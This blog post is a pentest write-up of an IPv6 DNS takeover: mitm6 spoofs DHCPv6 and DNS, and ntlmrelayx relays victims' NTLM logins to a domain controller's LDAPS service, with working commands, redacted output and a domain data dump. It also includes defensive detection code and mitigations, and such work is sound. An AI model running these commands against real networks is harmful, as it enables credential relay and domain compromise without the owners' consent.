Monday, May 08, 2023

IPv6 DNS Takeover via mitm6 (Write Up)

Howdy Readers!


If you're into network pentesting, I'm sure you're familiar with this type of vulnerability. It is all about IPv6 and DNS: Windows hosts ask for IPv6 configuration by default, and on most internal networks nobody legitimate answers them.


IPv6 is the latest version of the Internet Protocol, which is used to identify and communicate with devices on the internet. DNS or the Domain Name System is a service that translates human-readable domain names (like "google.com") into IP addresses (like "2xx.xx.xxx.xx2") that devices can use to connect to websites and other internet services.


So IPv6 DNS takeover via mitm6 is a technique for becoming the DNS server of the IPv6-enabled Windows hosts on a local network and redirecting the name lookups they make. "mitm6" (Fox-IT's tool) is short for "man-in-the-middle-6": it puts the attacker in the middle of the clients' IPv6 configuration and DNS traffic in order to carry out the takeover.


The attack begins with the attacker running mitm6 on the target segment. mitm6 periodically sends Router Advertisements to prompt hosts to ask for an address, and it answers the DHCPv6 Solicit/Request messages that Windows sends by default, handing each client an IPv6 address, a DNS search domain (the -d domain) and, crucially, the attacker's link-local address as its DNS server. Because Windows prefers the DNS servers it received over IPv6 to the IPv4 ones, the client's name lookups now go to the attacker. mitm6 does not advertise itself as a default gateway, so it is DNS that is hijacked, not all of the client's traffic.


Controlling DNS for the domain is what makes the rest possible. Windows clients with Web Proxy Auto-Discovery enabled look up wpad.<domain>; mitm6 answers with the attacker's address, the client fetches wpad.dat from ntlmrelayx's HTTP server, and the served PAC file points the client's proxy at the -wh host, which also resolves to the attacker. When the client then tries to use that proxy, ntlmrelayx demands authentication (HTTP 407) and the client's NTLM response, sent without any user interaction, is relayed to the LDAPS service on the domain controller, where ntlmrelayx authenticates as that user and dumps domain information into the loot directory. With the same DNS position an attacker could also send users to a look-alike site to harvest login credentials, but NTLM relay is what this write-up uses.
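To make the first step of that chain concrete, here is an added detection example, not code from this page, from mitm6 or from Impacket: a small Python parser for DHCPv6 Advertise/Reply messages that flags any DNS-server assignment outside an allowlist of known resolvers, the way a sensor on a span port or a host-side script could catch a rogue DHCPv6 server on the segment. The packet layout follows RFC 8415; the attacker's link-local address, the legitimate resolver 2001:db8:0:53::1 and the sample messages are all constructed for the demo.

```python
"""Detect rogue DHCPv6 DNS-server assignments of the kind mitm6 hands out.

Added example for this write-up, not part of mitm6 or Impacket. It parses the
UDP payload of a DHCPv6 message (RFC 8415 layout) and flags Advertise/Reply
messages whose DNS Recursive Name Server option points anywhere other than the
organisation's known IPv6 resolvers. The sample messages and the allowlist
below are constructed for the demo.
"""
import ipaddress
import struct

# RFC 8415 message types and option codes (only the ones needed here).
MSG_SOLICIT, MSG_ADVERTISE, MSG_REPLY = 1, 2, 7
OPT_CLIENTID, OPT_DNS_SERVERS, OPT_DOMAIN_LIST = 1, 23, 24


def parse_dhcpv6(payload: bytes) -> tuple[int, dict[int, list[bytes]]]:
    """Return (msg_type, {option_code: [option_data, ...]}) for one message.

    Header is msg-type (1 byte) + transaction-id (3 bytes); options follow as
    code(2)/len(2)/data TLVs. Truncated options raise instead of being skipped,
    so a malformed packet is never mistaken for a clean one.
    """
    if len(payload) < 4:
        raise ValueError("DHCPv6 header needs 4 bytes")
    options: dict[int, list[bytes]] = {}
    pos = 4
    while pos < len(payload):
        if pos + 4 > len(payload):
            raise ValueError("truncated option header")
        code, length = struct.unpack_from("!HH", payload, pos)
        data = payload[pos + 4:pos + 4 + length]
        if len(data) != length:
            raise ValueError("option data runs past end of message")
        options.setdefault(code, []).append(data)
        pos += 4 + length
    return payload[0], options


def decode_domain_list(data: bytes) -> list[str]:
    """Decode OPTION_DOMAIN_LIST: DNS wire-format names, no compression."""
    names, pos = [], 0
    while pos < len(data):
        labels = []
        while pos < len(data) and data[pos] != 0:
            n = data[pos]
            labels.append(data[pos + 1:pos + 1 + n].decode("ascii"))
            pos += 1 + n
        pos += 1  # skip the root-label terminator
        names.append(".".join(labels))
    return names


def rogue_dns_findings(payload: bytes, allowed_dns: set[str]) -> list[str]:
    """Flag server->client messages that assign a resolver outside allowed_dns.

    Only Advertise and Reply can hand out resolvers, so client Solicit/Request
    messages are ignored. A link-local resolver is called out separately: a
    real corporate DHCPv6 deployment hands out global addresses, while mitm6
    answers from the attacker's fe80:: address on the segment.
    """
    msg_type, options = parse_dhcpv6(payload)
    if msg_type not in (MSG_ADVERTISE, MSG_REPLY):
        return []
    search = [n for d in options.get(OPT_DOMAIN_LIST, []) for n in decode_domain_list(d)]
    findings = []
    for data in options.get(OPT_DNS_SERVERS, []):
        for i in range(0, len(data) - len(data) % 16, 16):
            addr = ipaddress.IPv6Address(data[i:i + 16])
            if str(addr) in allowed_dns:
                continue
            kind = "link-local" if addr.is_link_local else "non-allowlisted"
            note = f"; search list pushed: {', '.join(search)}" if search else ""
            findings.append(f"{kind} DNS server {addr} in msg-type {msg_type}{note}")
    return findings


def build_dhcpv6(msg_type: int, options: list[tuple[int, bytes]]) -> bytes:
    """Assemble a DHCPv6 message (constructed test data, fixed transaction id)."""
    body = b"".join(struct.pack("!HH", code, len(data)) + data for code, data in options)
    return bytes([msg_type]) + b"\x00\x00\x01" + body


def encode_domain_list(names: list[str]) -> bytes:
    """Encode names as DNS wire-format labels for OPTION_DOMAIN_LIST."""
    return b"".join(
        b"".join(bytes([len(l)]) + l.encode("ascii") for l in n.split(".")) + b"\x00"
        for n in names
    )


# Constructed samples: the attacker's link-local address and the resolver are made up.
ALLOWED_DNS = {"2001:db8:0:53::1"}
ROGUE_REPLY = build_dhcpv6(MSG_REPLY, [
    (OPT_DNS_SERVERS, ipaddress.IPv6Address("fe80::5054:ff:fe12:3456").packed),
    (OPT_DOMAIN_LIST, encode_domain_list(["test.redacted.site"])),
])
LEGIT_REPLY = build_dhcpv6(MSG_REPLY, [
    (OPT_DNS_SERVERS, ipaddress.IPv6Address("2001:db8:0:53::1").packed),
])
CLIENT_SOLICIT = build_dhcpv6(MSG_SOLICIT, [(OPT_CLIENTID, b"\x00\x01\x00\x01duid")])

if __name__ == "__main__":
    for name, pkt in [("rogue", ROGUE_REPLY), ("legit", LEGIT_REPLY), ("solicit", CLIENT_SOLICIT)]:
        print(name, rogue_dns_findings(pkt, ALLOWED_DNS))
```

Run as-is it flags the rogue Reply and ignores the legitimate Reply and the client Solicit. In a real deployment the payload comes from UDP 547-to-546 traffic on a span port or a host capture; on a network with no IPv6 rollout at all, any Advertise or Reply is itself the alert, so the allowlist can simply be empty.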


So below is the step by step procedure on how to execute the attack. (PS: This guide is taken from one of my internal network penetration test reports, so I redacted some sensitive information about the target.)


--Tools--

  • NMAP
  • NTLMRelayx from Impacket
  • mitm6

--Steps to Reproduce--


1. Let's determine the domain name of the target using Nmap (nmap -n -sV --script "ldap* and not brute" 1x.xx.xx.x1). The LDAP NSE scripts read the domain name and naming context from the rootDSE without credentials.

Sample output:

Nmap scan report for 1x.xx.xx.x1
Host is up (0.0020s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT     STATE  SERVICE           VERSION
53/tcp   open   domain            Simple DNS Plus
88/tcp   open   kerberos-sec      Microsoft Windows Kerberos (server time: 2023-05-01 10:20:01Z)
113/tcp  closed ident
135/tcp  open   msrpc?
139/tcp  open   netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open   ldap              Microsoft Windows Active Directory LDAP (Domain: test.redacted.site, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=test,DC=redacted,DC=site
|       ldapServiceName: test.redacted.site:[email protected]
|       isGlobalCatalogReady: TRUE
|       supportedSASLMechanisms: XXXX
|       supportedSASLMechanisms: XXX-XXXXXX
|       supportedSASLMechanisms: EXTERNAL
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedLDAPVersion: 3
|       supportedLDAPVersion: 2
|       supportedLDAPPolicies: MaxPoolThreads
|       supportedLDAPPolicies: MaxPercentDirSyncRequests
|       supportedLDAPPolicies: MaxDatagramRecv
|       supportedLDAPPolicies: MaxReceiveBuffer
|       supportedLDAPPolicies: InitRecvTimeout
|       supportedLDAPPolicies: MaxConnections
|       supportedLDAPPolicies: MaxConnIdleTime
|       supportedLDAPPolicies: MaxPageSize

<--snip-->
The LDAP banner and the ldap-rootdse output give us what the next steps need: the domain name (test.redacted.site) and confirmation that 1x.xx.xx.x1 is a domain controller, which makes it our relay target. An open 389/636 does not by itself mean the target is vulnerable: the relay to LDAPS only succeeds if the DC does not enforce LDAP channel binding (and, for plain LDAP, signing).

The IPv6 takeover part is not tied to LDAP or to any port on the DC at all: mitm6 works over DHCPv6 (UDP 546/547) and DNS (UDP 53) on the client segment, and the credentials it helps capture can be relayed to any target ntlmrelayx supports. LDAPS is simply the most rewarding one here.

2. Run ntlmrelayx using the following command (impacket-ntlmrelayx -6 -t ldaps://1x.xx.xx.x1 -wh fakewpad.test.redacted.site -l lootme). -6 makes it listen on IPv6 as well as IPv4, -t sets the relay target (the DC's LDAPS service), -wh names the fake WPAD proxy host the served PAC file points to (it must sit inside the domain mitm6 spoofs so victims resolve it to us), and -l is the loot directory where the LDAP dump is written.

Sample output:
impacket-ntlmrelayx -6 -t ldaps://1x.xx.xx.x1 -wh fakewpad.test.redacted.site -l lootme
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Serving PAC file to client ::ffff:1xx.xx.xx.1xx
[*] SMBD-Thread-6 (process_request_thread): Received connection from ::ffff:1xx.xx.xx.xx, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Serving PAC file to client ::ffff:1xx.xx.x.xx
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED

<--snip-->
As you can see, we received SUCCEED responses from ntlmrelayx: a client's NTLM authentication was relayed to LDAPS on the DC and accepted as TESTCLIENT/TESTUSER1. (The output above was captured after mitm6 from step 3 was already running; nothing happens until a client asks for an IPv6 configuration and gets our answer.)

3. Open another terminal and run mitm6 using the following command (mitm6 -d test.redacted.site). The -d flag is an allowlist: mitm6 only spoofs DNS replies for names under this domain, so hosts keep resolving everything else normally and the attack stays quiet.

Sample output:
mitm6 -d test.redacted.site
:0: UserWarning: You do not have a working installation of the service_identity module: 'No module named 'service_identity''.  Please install it from <https://pypi.python.org/pypi/service_identity> and make sure all of its dependencies are satisfied.  Without the service_identity module, Twisted can perform only rudimentary TLS client hostname verification.  Many valid certificate/hostname mappings may be rejected.
Starting mitm6 using the following configuration:
Primary adapter: eth0 [00:xx:xx:xx:xx:xx]
IPv4 address: 1xx.xx.xx.xx
IPv6 address: fxxx::2xx:xxxx:xxxx:xxxx
DNS local search domain: test.redacted.site
DNS allowlist: test.redacted.site
IPv6 address fxxx::2xxx:x is now assigned to mac=xx:xx:xx:xx:xx:xx host=TESTHOST. ipv4=
Sent spoofed reply for mgmt.test.redacted.site. to fxxx::xxx:xx

<--snip-->
4. Once ntlmrelayx reports SUCCEED, open another terminal and list the lootme folder (ls lootme).
5. Check the files in the lootme folder. When the relayed account is not privileged, ntlmrelayx falls back to dumping the directory, so expect domain_users, domain_groups, domain_computers, domain_policy and domain_trusts files in .grep, .html and .json form.
6. Verify the vulnerability. The SUCCEED lines plus a populated dump prove that an attacker on the segment, with no credentials and no user interaction, read domain data as a victim. If the relayed account had been privileged, ntlmrelayx would have gone further (by default it tries to create a new domain user and grant it elevated rights), so check the log for those lines as well.
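As an added helper (not part of Impacket or of the original write-up), this Python snippet parses the ntlmrelayx log shapes shown in step 2 and summarises which clients fetched the PAC file, which were relayed where, and which accounts authenticated successfully, so the verification in step 6 is backed by numbers rather than by eyeballing a scrolling terminal. The sample lines are constructed from the redacted output above plus one made-up FAILED line for TESTCLIENT/TESTUSER2.

```python
"""Summarise an ntlmrelayx run for the report: who was relayed where, and did it work.

Added example for this write-up, not part of Impacket. It matches the log line
shapes ntlmrelayx prints from its HTTP/SMB servers and relay clients and
aggregates them. SAMPLE_LOG is constructed from the redacted output on this
page; the FAILED line for TESTUSER2 is made up to show the other outcome.
"""
import re
from collections import Counter, defaultdict

# ntlmrelayx line shapes (as seen in the step 2 output).
RE_PAC = re.compile(r"Serving PAC file to client (\S+)")
RE_RELAY = re.compile(
    r"(?:Received connection from|Connection from) (\S+?)(?:,| controlled,) attacking target (\S+)"
)
RE_AUTH = re.compile(r"Authenticating against (\S+) as (\S+) (SUCCEED|FAILED)")


def summarise_relay_log(lines: list[str]) -> dict:
    """Aggregate PAC fetches, relayed connections and authentication results.

    An account that only ever FAILED against LDAPS, while others SUCCEED, is
    worth a note in the report: the DC may enforce channel binding for it, or
    the account may sit in Protected Users and never send NTLM at all.
    """
    pac_clients: set[str] = set()
    relayed: dict[str, set[str]] = defaultdict(set)   # client -> relay targets
    auth: Counter = Counter()                         # (target, account, result) -> count
    for line in lines:
        if m := RE_PAC.search(line):
            pac_clients.add(m.group(1))
        elif m := RE_RELAY.search(line):
            relayed[m.group(1)].add(m.group(2))
        elif m := RE_AUTH.search(line):
            auth[(m.group(1), m.group(2), m.group(3))] += 1
    succeeded = sorted({acct for (_, acct, res) in auth if res == "SUCCEED"})
    failed_only = sorted({acct for (_, acct, res) in auth if res == "FAILED"} - set(succeeded))
    return {
        "pac_clients": sorted(pac_clients),
        "relayed": {client: sorted(targets) for client, targets in relayed.items()},
        "succeeded": succeeded,
        "failed_only": failed_only,
        "attempts": sum(auth.values()),
    }


# Constructed sample: lines copied in shape from the redacted step 2 output,
# plus one invented FAILED line.
SAMPLE_LOG = """\
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Serving PAC file to client ::ffff:1xx.xx.xx.1xx
[*] SMBD-Thread-6 (process_request_thread): Received connection from ::ffff:1xx.xx.xx.xx, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[-] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER2 FAILED
""".splitlines()

if __name__ == "__main__":
    for key, value in summarise_relay_log(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

Feed it the saved terminal output (or ntlmrelayx's -of output file) from a real engagement; the "succeeded" list is the evidence that goes in the report, and "relayed" shows which client subnets were reachable by the spoofed DNS.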



--Recommendations--
  • The safest way to prevent man-in-the-middle attacks using mitm6 is to block DHCPv6 traffic and incoming Router Advertisements with Windows Firewall via Group Policy (the predefined Core Networking rules for DHCPv6 and ICMPv6 Router Advertisement can be set to Block). Disabling IPv6 completely is not supported by Microsoft and may cause unwanted side effects on the network; blocking these two inputs is enough to stop mitm6 from configuring clients.
  • If WPAD is not in use internally, disable it via Group Policy and stop and disable the WinHttpAutoProxySvc service.
  • Mitigate relay to LDAP and LDAPS by enforcing (not merely supporting) LDAP signing and LDAP channel binding on the domain controllers; signing protects LDAP on 389, channel binding protects LDAPS on 636.
  • Add administrative users to the Protected Users group, or mark them "Account is sensitive and cannot be delegated", to prevent impersonation of those users via delegation. Protected Users membership also disables NTLM authentication for those accounts, so their credentials cannot be relayed at all.
--References--
  • https://docs.microsoft.com/en-us/archive/blogs/netro/arguments-against-disabling-ipv6
  • https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course

The vulnerability was rated as Critical in our pentest reports.

I hope you find this article interesting and useful.

"Always remember that you are absolutely unique. Just like everyone else."
–Margaret Mead
